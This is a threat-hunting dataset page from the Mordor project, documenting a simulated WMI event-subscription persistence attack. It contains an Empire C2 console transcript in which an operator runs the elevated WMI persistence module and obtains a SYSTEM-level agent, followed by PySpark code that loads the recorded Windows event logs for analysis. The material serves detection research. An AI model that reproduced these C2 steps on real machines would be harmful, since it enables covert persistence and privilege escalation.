Empire Elevated WMI Eventing

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

[‘TA0003’, ‘TA0004’]

Techniques

[‘T1546.003’]

Tags

[‘Local WMI Eventing’, ‘WMI Event Subscriptions’]

Dataset Description

This dataset represents adversaries leveraging WMI subscriptions locally for persistence.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

wmi

Adversary View

(Empire: powershell/privesc/bypassuac_fodhelper) > agents
[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            
W2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         5584   5/0.0    2020-09-04 20:42:01  http            
13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5676   5/0.0    2020-09-04 20:41:59  http            

(Empire: agents) > interact 13ZK6G7M
(Empire: 13ZK6G7M) > 
(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*
(Empire: powershell/persistence/elevated/wmi) > info

              Name: Invoke-WMI
            Module: powershell/persistence/elevated/wmi
        NeedsAdmin: True
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y
  @jbooz1

Description:
  Persist a stager (or script) using a permanent WMI
  subscription. This has a difficult detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name        Required    Value                     Description
  ----        --------    -------                   -----------
  Agent       True        13ZK6G7M                  Agent to run module on.                 
  Listener    True        http                      Listener to use.                        
  DailyTime   False                                 Daily time to trigger the script        
                                                    (HH:mm).                                
  AtStartup   False       True                      Switch. Trigger script (within 5        
                                                    minutes) of system startup.             
  FailedLogon False                                 Trigger script with a failed logon      
                                                    attempt from a specified user           
  SubName     True        Updater                   Name to use for the event subscription. 
  ExtFile     False                                 Use an external file for the payload    
                                                    instead of a stager.                    
  Cleanup     False                                 Switch. Cleanup the trigger and any     
                                                    script from specified location.         
  UserAgent   False       default                   User-agent string to use for the staging
                                                    request (default, none, or other).      
  Proxy       False       default                   Proxy to use for request (default, none,
                                                    or other).                              
  ProxyCreds  False       default                   Proxy credentials                       
                                                    ([domain\]username:password) to use for 
                                                    request (default, none, or other).      

(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT
[*] Agent 13ZK6G7M tasked with task ID 1
[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi
(Empire: powershell/persistence/elevated/wmi) > 
WMI persistence established using listener http with OnStartup WMI subsubscription trigger.

(Empire: powershell/persistence/elevated/wmi) > 
(Empire: powershell/persistence/elevated/wmi) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent PYA28EDF checked in
[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to PYA28EDF at 172.18.39.5

(Empire: powershell/persistence/elevated/wmi) > 
(Empire: powershell/persistence/elevated/wmi) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            
W2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         5584   5/0.0    2020-09-04 20:43:48  http            
13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5676   5/0.0    2020-09-04 20:43:48  http            

PYA28EDF ps 172.18.39.5     WORKSTATION5      *THESHIRE\SYSTEM        powershell         7480   5/0.0    2020-09-04 20:49:29  http            

(Empire: agents) > interact PYA28EDF
(Empire: PYA28EDF) > shell whoami
[*] Tasked PYA28EDF to run TASK_SHELL
[*] Agent PYA28EDF tasked with task ID 1
(Empire: PYA28EDF) > 
nt authority\system
..Command execution completed.

(Empire: PYA28EDF) > 
(Empire: PYA28EDF) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname                   |Channel                             |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12     |18003|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |17918|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13     |11497|
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7      |9531 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10     |2785 |
|WORKSTATION5.theshire.local|security                            |5447   |2715 |
|WORKSTATION5.theshire.local|security                            |4658   |2629 |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|10     |1675 |
|WORKSTATION5.theshire.local|security                            |4656   |1361 |
|WORKSTATION5.theshire.local|security                            |4690   |1285 |
|WORKSTATION5.theshire.local|security                            |4663   |1083 |
|WORKSTATION5.theshire.local|security                            |4703   |997  |
|WORKSTATION5.theshire.local|security                            |5156   |482  |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|7      |402  |
|WORKSTATION5.theshire.local|security                            |5158   |372  |
|WORKSTATION5.theshire.local|security                            |4673   |347  |
|MORDORDC.theshire.local    |Security                            |5156   |314  |
|WORKSTATION5.theshire.local|Windows PowerShell                  |800    |286  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|9      |270  |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational|12     |252  |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows